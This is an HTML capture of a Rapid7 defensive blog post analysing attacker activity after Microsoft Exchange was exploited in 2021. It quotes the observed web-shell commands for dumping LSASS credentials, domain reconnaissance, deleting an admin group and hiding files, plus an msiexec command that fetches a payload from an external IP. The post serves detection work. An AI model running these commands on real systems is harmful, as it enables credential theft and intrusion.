
Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog

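<!DOCTYPE html>
<html class="no-js" lang="en" dir="ltr">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" charset="utf-8" />
  <meta http-equiv="x-ua-compatible" content="ie=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />

  <!-- Optimizely edge client. Scheme made explicit (was protocol-relative "//"):
       a preload is only consumed when its URL matches the later <script src>
       exactly, and an explicit https: rules out any downgrade of this request. -->
  <link rel="preload" href="https://opt.rapid7.com/edge-client/v1/13222550/21485331595" referrerpolicy="no-referrer-when-downgrade" as="script">
  <link rel="preconnect" href="https://logx.optimizely.com">

  <title>Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog</title>
  <meta property="og:url" content="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" />
  <link rel="canonical" href="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" />
  <link rel="alternate" href="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" hreflang="en" />
  <meta name="robots" content="index, follow" />
  <meta name="title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog" />
  <meta name="description" content="In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server." />
  <meta property="og:title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog" />
  <meta property="og:image" content="https://blog.rapid7.com/content/images/2021/03/zero-day-og-1.jpg" />
  <meta name="twitter:image" content="https://blog.rapid7.com/content/images/2021/03/zero-day-og-1.jpg" />
  <meta name="twitter:title" content="Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog">
  <meta name="twitter:card" content="summary_large_image">
  <meta property="og:site_name" content="Rapid7" />
  <meta property="og:description" content="In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server." />

  <!-- First-party stylesheets, cache-busted by build timestamp. -->
  <link rel="stylesheet" href="/includes/css/all.min.css?cb=1731962207034">
  <link rel="stylesheet" href="/includes/css/bundles/pages/page.blog-resources.min.css?cb=1731962207034" />
  <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-featured-posts.min.css?cb=1731962207034" />
  <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-single-post.min.css?cb=1731962207034" />
  <link rel="stylesheet" href="/includes/css/bundles/blocks/block.blog-related-posts.min.css?cb=1731962207034" />
  <meta name="facetcat" content="blog" />

  <!-- Tag-manager data layer, populated server-side per request. -->
  <script>
    // NOTE(review): the visitor's GeoIP result and raw public IP are rendered
    // into this inline script and pushed to the data layer, i.e. handed to
    // every tag the GTM container below chooses to fire. Confirm this is
    // intended and covered by the privacy notice. Because these values are
    // server-interpolated into JavaScript, the template layer must JS-escape
    // them; a value containing a quote or "</script>" would otherwise break
    // out of this block. Inline scripts also need a CSP nonce/hash if a CSP
    // is deployed.
    var gIp = {"countryIsoCode":"SG","subdivisionIsoCode":null,"continentIsoCode":"AS"};
    window.dataLayer = window.dataLayer || [];
    window.dataLayer.push({ 'conversionType': 'secondary', });
    window.dataLayer.push({ 'auth': false });
    window.dataLayer.push({ 'ip': '8.222.208.146' });
    window.dataLayer.push({ 'isTrialUser': false, 'isCustomer': false });
  </script>
  <script>
    window.dataLayer.push({ 'blog_post_tag': 'Zero-Day,Microsoft,Detection and Response,InsightIDR,Managed Detection and Response (MDR)' });
  </script>

  <!-- Optimizely edge client (no SRI: the bundle is served dynamically per project). -->
  <script src="https://opt.rapid7.com/edge-client/v1/13222550/21485331595" referrerpolicy="no-referrer-when-downgrade"></script>

  <!-- Google Tag Manager loader. Whatever is published in container
       GTM-WBTPTVC runs here with full page privileges; SRI cannot be applied
       to a dynamically served container, so access control and change review
       on the GTM account are the effective controls for this script. -->
  <script>
    (function (w, d, s, l, i) {
      w[l] = w[l] || [];
      w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' });
      var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != 'dataLayer' ? '&l=' + l : '';
      j.async = true;
      j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
      f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM-WBTPTVC');
  </script>

  <link rel="icon" type="image/x-icon" href="/includes/img/favicon.ico">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Mulish:wght@800;900&family=Roboto:wght@300;400;700">
  <!-- Font preloads: crossorigin is required for as="font" or the preload is wasted. -->
  <link rel="preload" href="/includes/fonts/FFGoodProCompressedBlack/FFGoodProCompressedBlack.woff2" as="font" type="font/woff2" crossorigin="anonymous" />
  <link rel="preload" href="/includes/fonts/FFGoodProCompressedBlack/FFGoodProCompressedBlack.woff" as="font" type="font/woff" crossorigin="anonymous" />

  <!-- jQuery is pinned with an SRI hash; keep the integrity attribute in step
       with the version when upgrading. -->
  <script src="https://code.jquery.com/jquery-3.6.4.min.js" integrity="sha256-oP6HI9z1XaZNBrJURtCoUT5SUnxFr8s3BzRl+cbzUq8=" crossorigin="anonymous"></script>
  <script src="/includes/js/populateCountryState.js"></script>

  <!-- NOTE(review): Marketo Forms2 is loaded twice on this page — once from
       the first-party host here and once from the marketo.com origin further
       down — and neither copy carries an integrity hash. Confirm one of the
       two can be dropped. -->
  <script src="https://information.rapid7.com/js/forms2/js/forms2.min.js" ></script>

  <meta property="og:type" content="article" />
  <meta property="article:published_time" content="2021-03-23T14:04:36" />
  <meta property="article:modified_time" content="2023-04-05T20:01:43" />
  <meta property="article:tag" content="Zero-Day" />
  <meta property="article:tag" content="Microsoft" />
  <meta property="article:tag" content="Detection and Response" />
  <meta property="article:tag" content="InsightIDR" />
  <meta property="article:tag" content="Managed Detection and Response (MDR)" />

  <!-- Second Forms2 load (see note above). Scheme made explicit; was protocol-relative. -->
  <script src="https://app-sj20.marketo.com/js/forms2/js/forms2.min.js"></script>

  <!-- Structured data for the article. mainEntityOfPage now points at the
       article URL (it previously pointed at the site root, which misdescribes
       which page this Article is the main entity of). -->
  <script type="application/ld+json">
  {
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
      "@type": "Organization",
      "name": "Rapid7 Blog",
      "logo": {
        "@type": "ImageObject",
        "url": "https://www.rapid7.com/favicon.ico",
        "width": 60,
        "height": 60
      }
    },
    "author": {
      "@type": "Person",
      "name": "Eoin Miller",
      "image": {
        "@type": "ImageObject",
        "url": "https://blog.rapid7.com/assets/images/default-author-image.png"
      },
      "url": "https://www.rapid7.com/blog/author/eoin/",
      "sameAs": []
    },
    "headline": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange",
    "url": "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/",
    "image": {
      "@type": "ImageObject",
      "url": "https://blog.rapid7.com/content/images/2021/03/zero-day.jpg"
    },
    "keywords": "Zero-Day, Microsoft, Detection and Response, InsightIDR, Managed Detection and Response (MDR)",
    "description": "In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server.",
    "mainEntityOfPage": {
      "@type": "WebPage",
      "@id": "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"
    },
    "datePublished": "2021-03-23T14:04:36",
    "dateModified": "2023-04-05T20:01:43"
  }
  </script>

  <style>
    body .mktoForm .mktoFormCol, body .mktoForm .mktoFormRow { float: none; }
    #modal-subscribe h2 { padding-bottom: .25rem; }
  </style>

  <!-- TODO(review): third-party stylesheet without SRI. cdnjs publishes a
       hash for every file; add integrity="sha512-…" crossorigin="anonymous"
       so a compromised or substituted CDN asset cannot inject CSS. -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/styles/a11y-dark.min.css">
</head>
<body class="pg-id-29536" data-page="29536">
  <!-- Google Tag Manager (noscript) -->
  <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WBTPTVC" title="Google Tag Manager" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
  <!-- End Google Tag Manager (noscript) -->
  <div id="__"></div>

  <!-- Legacy IE upgrade bar; only rendered by IE <= 9. Fixed the <spa> typo
       and added rel="noopener noreferrer" on the new-tab link so the opened
       page cannot reach back to window.opener. -->
  <!--[if lte IE 9]>
  <div id="ie-conditional"><span>Your IE browser is out of date - Upgrade to the latest version of IE or Chrome for an optimal website experience.</span> <a href="https://support.microsoft.com/en-us/help/17621/internet-explorer-downloads" title="Upgrade IE Now" class="button smBtn darkClear" target="_blank" rel="noopener noreferrer">Upgrade IE Now</a> <button class="close-button" type="button"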
"><a href="/blog/tag/application-security/">App Security</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tag/metasploit/">Metasploit</a></li><li class="sub-nav__link flex flex-dir-col "><a href="/blog/tags/">All Topics</a></li></ul></div><div class="sub-nav__utility"><a class="search" role="button" tabindex="0"><i class="r7-icon r7-icon-search-magnify"></i></a><a class="button button--primary" href="/trial/insight/">Start Trial</a><a class="to-top circle-button" tabindex="0"><i class="r7-icon r7-icon-arrow-chevron-up-solid"></i></a></div></div></nav></header> </div> <div class="off-canvas-content" data-off-canvas-content> <div id="menuOverlay" class="reveal-overlay"></div> <section class="longhero"> <div class="grid-container"> <div class="grid-x grid-padding-x expanded"> <div class="medium-12 cell"></div> </div> </div> </section> <div class="pageContent"> <section class="blog-single-post"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="small-12 medium-6 medium-offset-1 large-7 large-offset-1 cell blog-single-post__main-column"> <div class="grid-y"> <div class="blog-single-post__main-column--heading"> <h1>Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange</h1> <div> <ul class="blog-post-info"> <li class="date">Mar 23, 2021</li> <li class="time">18 min read</li> <li class="name"> <a href="/blog/author/eoin/">Eoin Miller</a> </li> </ul> <ul class="blog-post-social float-right"> <li><a 
href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/&amp;title=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&amp;summary=In+recent+weeks%2c+there+has+been+quite+a+lot+of+reporting+on+the+exploitation+of+the+latest+disclosed+vulnerabilities+in+Microsoft%e2%80%99s+Exchange+Server+by+an+attacker+referred+to+as+HAFNIUM." class="linkedin" onclick="window.open(this.href, 'linkedin-share', 'width=520,height=570');return false;"></a></li> <li><a href="https://twitter.com/intent/tweet?text=Defending+Against+the+Zero+Day%3a+Analyzing+Attacker+Behavior+Post-Exploitation+of+Microsoft+Exchange&amp;url=https%3a%2f%2fwww.rapid7.com%2fblog%2fpost%2f2021%2f03%2f23%2fdefending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange%2f" class="twitter-x" onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;"></a></li> <li><a href="https://www.facebook.com/sharer/sharer.php?u=https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" class="facebook" onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;"></a></li> </ul> </div> </div> <div class="post-content"> <p><i class="updated-at">Last updated at Wed, 05 Apr 2023 20:01:43 GMT</i></p> <p>In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in <a href="https://aka.ms/ExchangeVulns">Microsoft’s Exchange Server</a> by an attacker referred to as HAFNIUM. 
One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.</p><!--kg-card-begin: markdown--><blockquote> <p>“Running as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.”<br> Source: <a href="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities">Application Pool Identities</a></p> </blockquote> <!--kg-card-end: markdown--><p>Because this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the <a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege">principle of least privilege</a> and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim’s environment.</p><p>While the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. 
This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed the window between a vulnerability's disclosure and the mass adoption of a working exploit shrinking, which gives victims little time to test and deploy fixes while adhering to change control processes for systems providing mission-critical services.</p><p>Over the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold is <a href="https://attack.mitre.org/techniques/T1110/003/">password spraying</a> against systems that provide remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in <a href="https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/">Citrix Netscaler</a>, <a href="https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization">Progress’ Telerik</a>, and <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/">Pulse Secure’s Pulse Connect Secure</a>, to name a few.</p><p>While the method of gaining a foothold in a victim’s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. 
The reason for this is that the methods used once inside a victim’s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of “living off the land” techniques that use pre-existing utilities that come with the operating systems makes antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.</p><p>Because the way an attacker moves and acts can remain unchanged for so long, Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our <a href="https://www.rapid7.com/fundamentals/what-is-managed-detection-and-response-mdr/">Managed Detection and Response</a> Security Operations Center and <a href="https://www.rapid7.com/services/security-consulting/incident-response-services/">Incident Response</a> teams to develop and update our detections in <a href="https://www.rapid7.com/products/insightidr/">InsightIDR</a>’s <a href="https://docs.rapid7.com/insightidr/aba-detections">Attacker Behavior Analytics</a> to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to be alerted to attacker behavior even when the initial access was gained through an unknown vulnerability, and allows them to securely advance. </p><p>Last, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or a single group may exploit them and carry out several different types of follow-on activity. 
Without conclusive proof, proclaiming they are related is speculative, at best.</p><h2 id="hafnium-related-activity">HAFNIUM-related activity</h2><p>Through the use of our existing detections, Rapid7 observed attacker behavior using a <a href="https://attack.mitre.org/software/S0020/">China Chopper</a> web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7’s <a href="https://docs.rapid7.com/insight-agent/">Insight Agent</a> from Feb. 27 through March 7 in 2021. It should be noted that the way the attacker's China Chopper client spawns processes through the webshell has remained <a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">virtually unchanged since at least 2013</a>. The resulting command line arguments are quite distinct and easy to find in any log source that records process command lines. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.rapid7.com/content/images/2021/03/image1-6.png" class="kg-image" alt="Excerpt from the FireEye China Chopper report (p. 21)"><figcaption><em>Source: </em><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf"><em>The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)</em></a></figcaption></figure><p>Rapid7 developed additional detections based on the review of this attacker behavior. 
We noticed that, by default, when IIS is configured for Microsoft Exchange’s Outlook Web Access, it has the following environment variable and value set:</p><!--kg-card-begin: markdown--><p><code>APP_POOL_ID=MSExchangeOWAAppPool</code></p> <!--kg-card-end: markdown--><p>With this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with <a href="https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/">InsightIDR’s Attacker Behavior Analytics</a>, the TIDE team was able to write a detection that would match any time any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. </p><p>Using China Chopper, the attacker executed the Microsoft Sysinternals utility <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procdump">procdump64.exe</a> against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as <a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a> to <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump">extract passwords from the memory dump of this process</a>. This enables the attacker to potentially return to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is “ThisIsMyPassword1!”, when forced to change, they will likely just increment the digit at the end to “ThisIsMyPassword2!”. 
This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.</p><p>The following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:</p><p>Procdump.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d C:\\root&amp;procdump64.exe -accepteula -ma lsass.exe lsass.dmp&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d E:\\logs&amp;procdump64.exe -accepteula -ma lsass.exe lsass.dmp&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Reconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d &quot;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&amp;HOSTNAME&quot; &amp; nltest /dclist:&lt;REDACTED_DOMAIN&gt;&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d &quot;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&amp;nltest&quot; /dclist:&lt;REDACTED_DOMAIN&gt;&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d &quot;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&amp;HOSTNAME&quot; &amp; whoami &amp; nltest /dclist:&lt;REDACTED_DOMAIN&gt;&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d c:\\temp&amp;tasklist&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d E:\\logs&amp;tasklist &amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;net group &quot;Domain computers&quot; /do&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;tasklist /v&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Enumeration of further information about specific processes on the victim system. 
The process smex_master.exe is from <a href="https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html">Trend Micro’s ScanMail</a> and unsecapp.exe is from <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c">Microsoft Windows</a>.</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;wmic process where name=smex_master.exe get ExecutablePath,commandline&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;wmic process where name=unsecapp.exe get ExecutablePath&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;wmic process where name=unsecapp.exe get processid&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Deletion of groups in Active Directory using the net.exe command executed via China Chopper:</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&amp;net group &quot;Exchange Organization administrators&quot; administrator /del /domain&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Network connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d &quot;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&amp;ping&quot; -n 1 &lt;REDACTED_HOSTNAME&gt;&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d &quot;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&amp;ping&quot; -n 1 &lt;REDACTED_HOSTNAME&gt;&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot&amp;ping -n 1 8.8.8.8&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;c:\windows\temp\curl.exe -m 10 
ipinfo.io&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;c:\windows\temp\curl.exe -vv -k -m 10 https://www.google.com &gt; C:\windows\temp\b.log 2&gt;&amp;1&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;ping -n 1 ipinfo.io&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;ping -n 1 www.google.com&amp;echo [S]&amp;cd&amp;echo [E] cmd /c cd /d c:\\temp&amp;ping www.google.com&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Second-stage payload retrieval commands executed via China Chopper webshell:</p><!--kg-card-begin: markdown--><pre><code>cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client&amp;msiexec /q /i http://103.212.223.210:9900/nvidia.msi&amp;echo [S]&amp;cd&amp;echo [E] </code></pre> <!--kg-card-end: markdown--><p>Filesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:</p><!--kg-card-begin: markdown--><pre><code>\cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&amp;findstr Request &quot;\\&lt;REDACTED_HOSTNAME&gt;\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ErrorFF.aspx&amp;echo&quot; [S]&amp;cd&amp;echo [E] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&amp;attrib +h +s +r OutlookEN.aspx&amp;echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&amp;attrib +h +s +r TimeoutLogout.aspx&amp;echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&amp;del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookEN.aspx'&amp;echo [S] cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&amp;del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\TimeoutLogout.aspx'&amp;echo [S] </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web 
Access</li><li>Attacker Technique - Net Command Deleting Exchange Admin Group</li><li>Attacker Tool - China Chopper Webshell Executing Commands</li><li>Attacker Technique - ProcDump Used Against LSASS</li></ul><h2 id="mitre-attck-techniques-observed-in-hafnium-related-activity">MITRE ATT&amp;CK techniques observed in HAFNIUM-related activity</h2><ul><li><a href="https://attack.mitre.org/techniques/T1003/">T1003</a> - OS Credential Dumping</li><li><a href="https://attack.mitre.org/techniques/T1003/001/">T1003.001</a> - OS Credential Dumping: LSASS Memory</li><li><a href="https://attack.mitre.org/techniques/T1005">T1005</a> - Data from Local System</li><li><a href="https://attack.mitre.org/techniques/T1007">T1007</a> - System Service Discovery</li><li><a href="https://attack.mitre.org/techniques/T1033">T1033</a> - System Owner/User Discovery</li><li><a href="https://attack.mitre.org/techniques/T1041/">T1041</a> - Exfiltration Over C2 Channel</li><li><a href="https://attack.mitre.org/techniques/T1047">T1047</a> - Windows Management Instrumentation</li><li><a href="https://attack.mitre.org/techniques/T1057">T1057</a> - Process Discovery</li><li><a href="https://attack.mitre.org/techniques/T1059">T1059</a> - Command and Scripting Interpreter</li><li><a href="https://attack.mitre.org/techniques/T1059/003">T1059.003</a> - Command and Scripting Interpreter: Windows Command Shell</li><li><a href="https://attack.mitre.org/techniques/T1071">T1071</a> - Application Layer Protocol</li><li><a href="https://attack.mitre.org/techniques/T1071/001">T1071.001</a> - Application Layer Protocol: Web Protocols</li><li><a href="https://attack.mitre.org/techniques/T1074">T1074</a> - Data Staged</li><li><a href="https://attack.mitre.org/techniques/T1074/001">T1074.001</a> - Data Staged: Local Data Staging</li><li><a href="https://attack.mitre.org/techniques/T1083/">T1083</a> - File and Directory Discovery</li><li><a href="https://attack.mitre.org/techniques/T1087">T1087</a> - Account 
Discovery</li><li><a href="https://attack.mitre.org/techniques/T1087/001">T1087.001</a> - Account Discovery: Local Account</li><li><a href="https://attack.mitre.org/techniques/T1087/002">T1087.002</a> - Account Discovery: Domain Account</li><li><a href="https://attack.mitre.org/techniques/T1098">T1098</a> - Account Manipulation</li><li><a href="https://attack.mitre.org/techniques/T1105/">T1105</a> - Ingress Tool Transfer</li><li><a href="https://attack.mitre.org/techniques/T1190">T1190</a> - Exploit Public-Facing Application</li><li><a href="https://attack.mitre.org/techniques/T1203">T1203</a> - Exploitation For Client Execution</li><li><a href="https://attack.mitre.org/techniques/T1218">T1218</a> - Signed Binary Proxy Execution</li><li><a href="https://attack.mitre.org/techniques/T1218/007/">T1218.007</a> - Signed Binary Proxy Execution: Msiexec</li><li><a href="https://attack.mitre.org/techniques/T1505/">T1505</a> - Server Software Component</li><li><a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a> - Server Software Component: Web Shell</li><li><a href="https://attack.mitre.org/techniques/T1518">T1518</a> - Software Discovery</li><li><a href="https://attack.mitre.org/techniques/T1518/001">T1518.001</a> - Software Discovery: Security Software Discovery</li><li><a href="https://attack.mitre.org/techniques/T1531">T1531</a> - Account Access Removal</li><li><a href="https://attack.mitre.org/techniques/T1583">T1583</a> - Acquire Infrastructure</li><li><a href="https://attack.mitre.org/techniques/T1583/003">T1583.003</a> - Acquire Infrastructure: Virtual Private Server</li><li><a href="https://attack.mitre.org/techniques/T1587">T1587</a> - Develop Capabilities</li><li><a href="https://attack.mitre.org/techniques/T1587/001">T1587.001</a> - Develop Capabilities: Malware</li><li><a href="https://attack.mitre.org/techniques/T1587/004">T1587.004</a> - Develop Capabilities: Exploits</li><li><a href="https://attack.mitre.org/techniques/T1588">T1588</a> - 
Obtain Capabilities</li><li><a href="https://attack.mitre.org/techniques/T1588/001">T1588.001</a> - Obtain Capabilities: Malware</li><li><a href="https://attack.mitre.org/techniques/T1588/002">T1588.002</a> - Obtain Capabilities: Tool</li><li><a href="https://attack.mitre.org/techniques/T1588/005">T1588.005</a> - Obtain Capabilities: Exploits</li><li><a href="https://attack.mitre.org/techniques/T1588/006">T1588.006</a> - Obtain Capabilities: Vulnerabilities</li><li><a href="https://attack.mitre.org/techniques/T1595">T1595</a> - Active Scanning</li><li><a href="https://attack.mitre.org/techniques/T1595/001">T1595.001</a> - Active Scanning: Scanning IP Blocks</li><li><a href="https://attack.mitre.org/techniques/T1595/002">T1595.002</a> - Active Scanning: Vulnerability Scanning</li></ul><h2 id="non-hafnium-related-activity">Non-HAFNIUM-related activity</h2><p>Rapid7 has also observed, in recent weeks, several additional distinct types of post-exploitation activity following exploitation of these Exchange vulnerabilities by attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.</p><h3 id="minidump-and-makecab-attacker">Minidump and Makecab attacker</h3><p>This attacker was seen uploading batch scripts to execute the Microsoft utility <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)">dsquery.exe</a> to enumerate all users from the Active Directory domain. The attacker would also use the <a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll">Minidump function in comsvcs.dll</a> with rundll32.exe in order to write the memory of the lsass.exe process to disk. 
